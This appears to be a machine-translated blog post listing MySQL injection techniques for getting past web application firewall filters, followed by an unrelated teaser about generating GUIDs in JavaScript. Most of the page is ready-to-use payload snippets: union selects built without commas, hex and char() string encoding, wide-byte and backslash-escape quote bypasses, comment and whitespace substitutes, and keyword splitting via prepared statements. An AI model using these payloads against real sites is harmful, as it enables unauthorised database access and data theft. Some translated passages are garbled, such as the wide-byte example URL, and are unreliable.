MySQL injection bypasses WAF summary


MySQL injection bypasses WAF summary

Filter equals sign

select * from user where id = 2;
select * from user where id like 2;
select * from user where id rlike 2;
select * from user where id regexp 2;
select * from user where id > 1 and id < 3;
select * from user where !id <> 2;
select * from user where not id <> 2;

Tips: < > is not equal to

Filter information_ schema

See this blog post for details

Filter comma

  • Construct multi table join
select * from users where name="admin" union select 1, 2, 3, 4;
select * from users where name="admin" union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
  • Find alternative grammar with the same meaning
select substr("abcde", 2, 3);
select substr("abcde" from 2 for 3);
select * from users limit 1, 2;
select * from users limit 2 offset 1;

Filter quotation marks

  • Wide byte injection


  1. Use multibyte encoding
  2. The lower part of multi byte encoding contains the encoding of single byte character set (for example, UTF-8 does not meet this requirement)

The core harm of wide byte injection is to eat ASCII characters and turn them into multi byte encoded characters

Common situations:

By inserting a non ASCII byte, the byte is spliced with it after encountering%5c (backslash) to become a wide byte (such as Chinese). Therefore, the escape is bypassed by eating the backslash


When the URL code cannot be passed in, you can change the idea. The client is UTF-8 coding. The Chinese characters we pass in the past are three bytes, and the backslash is one byte. Then you can use a Chinese character plus a backslash to form four bytes, and then go to the database to change into two Chinese characters after GBK coding, and eat them again
index. php? Id = 1 sea '

  • Hexadecimal injection
select * from users where name="admin";
select * from users where name=0x61646d696e;
  • Char function replacement
select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116);
  • Escape character injection

The target system does not filter escape symbols

select * from 36d_user where username='$uname' and password='$passwd';
select * from 36d_user where username='admin\' and password=' your_sql_here# ';

Only numbers can be echoed

The echoed data may be operated with numbers. Because the weak type of MySQL will convert the string into numbers for operation, the echoed string cannot be obtained

select hex(hex(database()));

After the secondary hex coding, it is all numbers, just bypassing

Filter union select

select * from users union all select 1, 2, 3, 4;

Filter comment

  • Try all annotators
--+This is actually the same as the above, except that + in the URL is equivalent to a space
  • Find a way to close the following statement

Use and, or&&
For example, you can use the or statement to ignore the following conditions
Also close the following quotation marks, parentheses, etc. according to the situation

SELECT * FROM users WHERE id=('1') union all select 1,2,3 or ('') LIMIT 0,1

select * from users where id =''/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22';

Filter spaces

  • Replace spaces with other symbols
%0C page feed
%09 tabs
%0d enter
%0A line feed
  • Other means of separating statements

The essence of spaces is to separate different statements

select * from users where name =(1)union(select(1),2,3,4);

Filter keywords

  • Case bypass

  • Double write bypass

  • Precompiled bypass

    set @sql = concat('sele','ct',' * from table;');
    prepare stm from @sql;
    execute stm;--+
  • Modify table structure bypass

    • Sometimes select / Union and other query statements are filtered. You can consider changing the table name to be queried to the table name originally queried, and then changing the table originally queried to other names, so that the website can output the table we want to query by itself
  • Other keyword replacement

    • Handler syntax instead of select
    • Equivalent function substitution
    • Replace and, or with & &, |
    • Numeric injection can replace or and with operators

Recommended Today

JS generate guid method

JS generate guid method Globally unique identification(GUID) is an algorithm generatedBinaryCount Reg128 bitsNumber ofidentifier , GUID is mainly used in networks or systems with multiple nodes and computers. Ideally, any computational geometry computer cluster will not generate two identical guids, and the total number of guids is2^128In theory, it is difficult to make two […]